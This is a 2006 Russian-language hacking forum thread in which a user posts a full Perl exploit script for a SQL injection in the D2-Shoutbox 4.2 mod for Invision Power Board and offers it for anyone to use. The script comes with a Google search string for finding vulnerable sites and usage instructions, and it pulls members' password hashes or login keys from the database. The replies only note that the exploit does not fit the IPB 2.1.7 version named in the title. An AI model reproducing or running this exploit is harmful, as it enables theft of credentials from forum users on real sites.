ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу Exploit для IPB 2.1.7
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Exploit для IPB 2.1.7
  #1  
Старый 07.09.2006, 11:29
Аватар для samurays
samurays
Новичок
Регистрация: 11.07.2006
Сообщений: 5
Провел на форуме:
31096

Репутация: -5
По умолчанию Exploit для IPB 2.1.7
Вот насшёл експлоит, но он у меня не работает, наверное там где мне надо его прменить нет этого модуля, D2-Shoutbox.
Может кому пригодится.

#!/usr/bin/perl
################################################## #######
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
#Created By SkOd #
#SED security Team #
#http://www.sed-team.be #
#skod.uk@gmail.com #
#ISRAEL #
################################################## #######
#google:
#"Powered By D2-Shoutbox 4.2"
################################################## #######
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid = $ARGV[3];
$pid = $ARGV[4];
$type = $ARGV[5];

sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2\n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.", null,null,null%20FROM%20ibf_members%20where%20id=" .$user."/*";
$path = $ARGV[1].$sql;
}


sub header()
{
print q{
################################################## #####################
### D2-Shoutbox 4.2 SQL injection Exploit ###
### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
### Created By SkOd, Sed Security Team ###
################################################## #####################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
################################################## #####################
}
}

sub sedsock()
{
$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> $host, PeerPort => "80") || die "[-]Connect
Failed\r\n";
print $sedsock "GET $path HTTP/1.1\n";
print $sedsock "Host: $host\n";
print $sedsock "Accept: */*\n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
print $sedsock "Connection: close\n\n";
while($res = <$sedsock>){
$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User:
$user\n[+]Md5 Hash: $1\n";
}
}

if(@ARGV < 6){
header();
}else{
type();
sedsock();
}
#securitydot.net - 2006-03-06

http://securitydot.net
 
Ответить с цитированием

  #2  
Старый 07.09.2006, 11:35
Аватар для SladerNon
SladerNon
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807

Репутация: 901


По умолчанию
#securitydot.net - 2006-03-06

Тебя наверно даже дата не смутила? )
Последний раз редактировалось SladerNon; 07.09.2006 в 11:48..
 
Ответить с цитированием

  #3  
Старый 07.09.2006, 11:51
Аватар для ~Real F@ck!~
~Real F@ck!~
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
Провел на форуме:
2382453

Репутация: 354
Отправить сообщение для ~Real F@ck!~ с помощью ICQ
По умолчанию
Это ваще эксплоит не под 2.1.7! Короче нефига он сделать неможет этот эсплоит!
 
Ответить с цитированием

  #4  
Старый 07.09.2006, 13:10
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
учимся читать =) D2-Shoutbox 4.2(IPB Mod)<=SQL injection
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Софт для мобильных телефонов под *nix Grrl Сотовый фрикинг 2 02.03.2007 01:47
Редактирование содежимого прошивок для Самсунгов Digimortal Схемы и программы 3 28.02.2007 14:22
какОй трой ИСпоЛЬзоваТЬ длЯ поЛНого УПРАвЛЕиЕ уд.КОМПОМ? UnKn0wN E-Mail 32 08.04.2006 04:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ